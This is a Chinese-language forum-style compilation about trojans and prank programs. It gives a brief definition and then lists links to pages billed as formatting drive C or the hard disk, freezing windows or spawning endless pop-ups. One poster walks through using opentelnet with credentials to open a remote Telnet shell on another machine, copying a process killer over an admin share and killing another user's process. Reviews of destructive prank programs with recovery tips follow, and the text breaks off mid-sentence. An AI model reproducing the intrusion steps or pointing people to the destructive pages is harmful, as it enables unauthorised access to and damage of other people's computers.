什么是恶意木马程序啊？

木马（全称特洛伊木马） 是根据古希腊神话木马来命名的。黑客程序以此命名有“一经潜入，后患无穷”之意。木马程序表面没有任何异常，，但实际却隐含着恶意企图。一些木马程序会通过覆盖文件的方式潜入于系统中，患有一些以正常软件的形式出现。恶意代码的关键技术有1生存技术，2攻击技术，3隐藏技术，黑客利用恶意代码攻击他人计算机，窃取他人资料和商业机密等等

‡与龟同行‡ 叫你计算机“爬”着工作 http://wwwopopncom/Home/zm/wmahtml

‡跳动窗口‡ 让你的窗口跳起来 http://wwwopopncom/Home/zm/tdhtml

‡窗口冻结‡ 冻结你的窗口，使窗口无法再响应 http://wwwopopncom/Home/zm/dongjiehtml

‡鼠标失控‡ 鼠标碰到跳出无数个窗口 http://wwwopopncom/Home/zm/shubiaohtml

‡超级地震‡ 屏幕地震啊 http://wwwopopncom/Home/zm/pinzhenhtml

‡鼠标底限‡ 让你的鼠标永远点下去 http://wwwopopncom/Home/zm/shudianxiaquhtml

‡强迫聊天‡ 很恶心的常见整人效果 http://wwwopopncom/Home/zm/qiangpohtml

‡无穷玩尽‡ 弹出无限窗口 http://wwwopopncom/Home/zm/tanchuangkouhtml

‡格C盘‡ 极度危险--轻意不要试 http://wwwopopncom/Home/zm/gaoweihtml

‡死亡窗口‡ (黑客特效)冻结你的窗口，使窗口无法再响应 http://wwwopopncom/Home/zm/duochuanghtml

‡恶作剧‡ 被黑了吧!下次要小心呀 http://wwwopopncom/Home/zm/ezuojuhtml

‡格式化硬盘‡ 将硬盘格式化---轻意不要试 http://wwwopopncom/Home/zm/geishihuanyipanhtml

‡黑客特效‡ 这简直是一个疯狂的效果。。 大地震啊。！！！ http://wwwopopncom/Home/zm/buyaohtml

‡强迫进站‡ 呵一个完全强制别人逛它处的站点。你按运行试试再关闭后就可以知道效果 http://wwwopopncom/Home/zm/qiangpohtml

‡IE炸弹‡ IE视窗炸弹或者叫让IE不段循环的代码 http://wwwopopncom/Home/zm/siIEhtml

页面被冻结 打开后窗口被冻结,就像死机

http://wwwopopncom/Home/zm/renyidianhtml

新电脑死机 下面的每一个按钮都很危险,一按你的电脑立即死机

http://wwwopopncom/Home/zm/dongjie2html

这么多

我刚才就在整，有人在看黄片，我拿我我的终极武器，opentelnet和进程结束工具aproman上场了。

先进DOS，opentelnet 远程启动目标主机的Telnet服务，并绑定端口到7878，见下：

opentelnetexe \\192168059 用户名 密码 1 7878

看下边成功了！

BINGLE!!!Yeah!!

Telnet Port is 7878 You can try:"telnet ip 7878", to connect the server!

Disconnecting serverSuccessfully!

进入DOS方式下输入：

telnet 192168059 7878

出现欢迎屏幕：

===============================================================

欢迎使用 Microsoft Telnet 服务器。

===============================================================

C:\>

然后把进程查看和结束工具拷贝到对方C盘

copy \\192168067\c$\apromanexe c:

已复制 1 个文件。

运行APROMA。EXE出现用法：

C:\>apromanexe

AProMan v12 - Process Manager

Copyright (C) 2000-2003 by Antiy Labs

http://wwwantiynet

Usage:

-a : Show All Processes

-p : Processes to Ports Mapper ( Administrator privilege needed )

-t [PID] : Terminate process

-f [FileName] : Save all processes and modules infomation to file

好，现在来查看对方进程

c:>apromanexe -a

看出来了：

176 \\C:\WINNT\system32\winlogonexe

228 C:\WINNT\system32\servicesexe

240 C:\WINNT\system32\lsassexe

416 C:\WINNT\system32\svchostexe

440 C:\WINNT\system32\spoolsvexe

472 C:\WINNT\system32\svchostexe

568 C:\WINNT\system32\MSTaskexe

524 C:\WINNT\system32\stisvcexe

696 C:\WINNT\System32\WBEM\WinMgmtexe

1488 C:\WINNT\system32\regsvcexe

1072 C:\WINNT\system32\tlntsvrexe

1492 C:\WINNT\system32\tlntsessexe

1500 C:\WINNT\system32\cmdexe

1224 C:\WINNT\system32\userinitexe

1664 C:\WINNT\ExplorerEXE

1612 C:\WINNT\system32\Rundll32exe

1360 C:\WINNT\system32\Clsmnexe

844 C:\Program Files\Thunder Network\Thunder\ThunderShellexe

1952 C:\Program Files\Common Files\Real\Update_OB\realschedexe

1436 C:\WINNT\system32\internatexe

1372 C:\Program Files\Tencent\QQ\QQexe

1432 C:\Program Files\Tencent\QQ\TIMPlatformexe

1312 C:\AProManexe

265 C:\Program Files\pp\ppexe

C:\>

看到了吗？在用PP看黄片。好我们结束进程PP。

C:\>apromanexe -t 265

出现：

AProMan v12 - Process Manager

Copyright (C) 2000-2003 by Antiy Labs

http://wwwantiynet

(PID: 1380 )Process terminated succeed!

成功了。当然，也可以关机，结束对方进程 ID176 就可以了

176 \\C:\WINNT\system32\winlogonexe

一、norun

norun是个恶作剧软件,它只有一个可执行文件,12288字节大小,运行于Win98/ME下运行后要求回答三道算数题虽然题目很简单,但是一旦答错,机器将连续重启动12次（每次都有提示）后恢复正常除此之外,没有其他影响因此,norun是个真正的恶作剧软件,对大家的威胁并不大不过,如果机器真的重新启动12次的话,也够恐怖的！所以也要掌握应对它的方法

最直接的方法是你回答对那三道题就可以了不要担心,是小学二年级的都会做的算数题

如果你回答对了,就会出现对话框,点击"确定"软件运行结束由于你回答对了,所以不会出现连续重启动12次这样的现象

如果你担心自己马虎回答错误（如果这个也回答不正确,那也太……）,可以用进程管理软件终止该进程,这样就可以了我们以Windows优化大师为例运行Windows优化大师,点击"系统安全优化"→"进程管理",在弹出的窗口中选中norun,点击"终止"按钮即可终止运行它,从而避免了norun造成的12次重启

点评：纯粹的恶作剧软件,可以用来跟朋友开玩笑用

恶毒程度：★

二、ilr

ilr也是个恶作剧程序,文件大小15KB这么小的程序能干些什么破坏呢？它是个捉弄人的程序,运行后会把硬盘上所有分区里的文件夹通通变成回收站！使得你无法通过点击进入该文件夹！天啊,我要是想进入文件夹该怎么办呢？别着急,恢复方法是用以下格式运行该软件即可：xxxxexe -recover,要记牢格式哦！

点评：一个很另类的恶作剧软件,不破坏数据,不会让你无法进入系统中,但是它会让你无法进入文件夹,使你干着急,可以用来跟朋友开玩笑用

恶毒程度：★★

三、FUHD

这是一个垃圾文件生成器,程序运行后会在各磁盘（C:-H:）的每一个根目录、第一级子目录和第二级子目录生成随机文件名的垃圾文件很久以前有个软件hdfillexe有相似的功能,但是该hdfill需要VB4的运行库才能运行,在没有VB4运行库的机器中不能运行该程序而该程序是用VB5编写的,虽然存在运行库的问题,但Win98中已经带有VB5的运行库,所以该程序可以在许多电脑中运行成功也就是说许多朋友都有中招的可能和危险！

FUHD压缩包由四个文件组成：

FUHDexe：大小10752字节,所用图标为VB5的安装程序所用图标直接在磁盘上生成垃圾文件,程序在后台运行,全过程没有任何提示

setupexe：大小10752字节,所用图标为VB5的安装程序所用图标运行后在后台生成垃圾文件

Undoexe：大小6656字节这是作者提供的删除上面两个EXE生成的垃圾文件的文件,如果你中招了,可以找来该文件,运行后就可以清除那些垃圾文件

readmetxt：说明文件

点评：虽然说现在很多人都有大硬盘,但是大量的垃圾文件分布在各个目录中,也是一件很麻烦的事而且目录中含有过多的文件,会大大减慢系统的速度作为恶作剧软件,它的危害不大但如果不知道解除方法,也很讨厌

恶毒程度：★★☆

四、Carem3

Carem3是网络休闲庄（一个黑客网站）技术顾问Carem的作品,这是一个非常狠毒的恶意攻击软件,运行后如果不知道正确的破解方法,那肯定是要重装系统的解压后的Carem3只有一个文件Carem3exe,这是它所用的图标（左图）,大家记住了,轻易不要运行使用这个图标的软件,因为给你下套的人会给它改名的,所以记住它的文件大小也是个不错的识别方法,Carem3exe文件大小321536字节

此时鼠标被控制在一定范围内,无法点击屏幕上的按钮,按动回车键就会弹出个窗口警告你不要随意运行可执行程序,说这只是个教训之类的话,然后会自动重新启动电脑,但你再也无法进入心爱的Windows桌面了！如果你没有按动任何键,Carem3也不会放过你,它会自动倒记时,从20秒到0就重新启动电脑,使你的系统崩溃！

程序的基本原理是破坏C:\windows\system\下的vmm32vxd文件vmm32vxd是虚拟设备驱动程序,正常文件大小913413字节,文件修改时间为1999－01－13,就是由于它被破坏了（文件被替换为同名文件,大小变为81531字节,文件修改时间变为1998－06－19）,导致你的计算机不能进入Windows系统

作者提供的破解方法是：在开机的时候按F8选择Command prompt only方式进入DOS下,之后在提示符后执行repair,就可以解决了另外你事先备份了vmm32vxd文件,就可以使用另外一个破解方法：用启动盘从A盘启动计算机,将备份的vmm32vxd复制到c:\windows\system\里,重新启动计算机就可以了如果没有备份,到其他计算机上复制一个来吧

除了上面说的那两个方法,还有一个更简便的破解方法我们在Carem3exe刚运行后,倒记时尚未结束前,按住ALT+F4键关闭软件窗口（不要指望能通过按Ctrl+Alt+Del来终止它,作者早就将这些按键屏蔽了）,此时你的鼠标将被锁定在桌面的某个小范围内（屏幕中央偏右一点）,鼠标是无法使用了但是如果你自己不重新启动电脑的话,Carem3exe也不会自动重新启动你的电脑——因为它已经被关闭了此时的你可以使用键盘来操作,如果嫌麻烦,直接重新启动电脑即可不要害怕,我们按ALT+F4时已经将软件关闭了,在破坏开始前就将它给消灭了,所以这次重新启动电脑和我们平常重新启动电脑一样,是安全的！顺便说一句如果你的系统是Win2000以下就要小心它了！

点评：比较恶毒,因为一般人想不到它会破坏vmm32vxd,不过还好,作者提供了破解的方法,所以还在可控范围内

恶毒程度：★★★

五、妖之吻

妖之吻是千年老妖的作品下载解压后大小252KB,只有一个文件名为yzwexe的可执行文件,它的外表看起来很友善——图标是两只握在一起的手！如果你被这表面上的友善所打动,双击运行了这个程序,哈哈,你的恶梦就此开始了！

首先,屏幕上会出现一个不大好看的窗口,上面写着"亲爱的,给你一个关机之吻",同时在窗口中显示60、59、58……这样的倒计时数,记时到"0"系统就自动重新启动当你再次听到Windows的启动声音,以为没什么事的时候,那个可恶的"亲爱的,给你一个关机之吻"又出现了,然后再次重启,如此反复,陷入一个死循环中,使你根本无法进入你的系统你若想在那个窗口出现时按"Ctrl+Alt+Del"来终止它,根本就不管用,因为作者将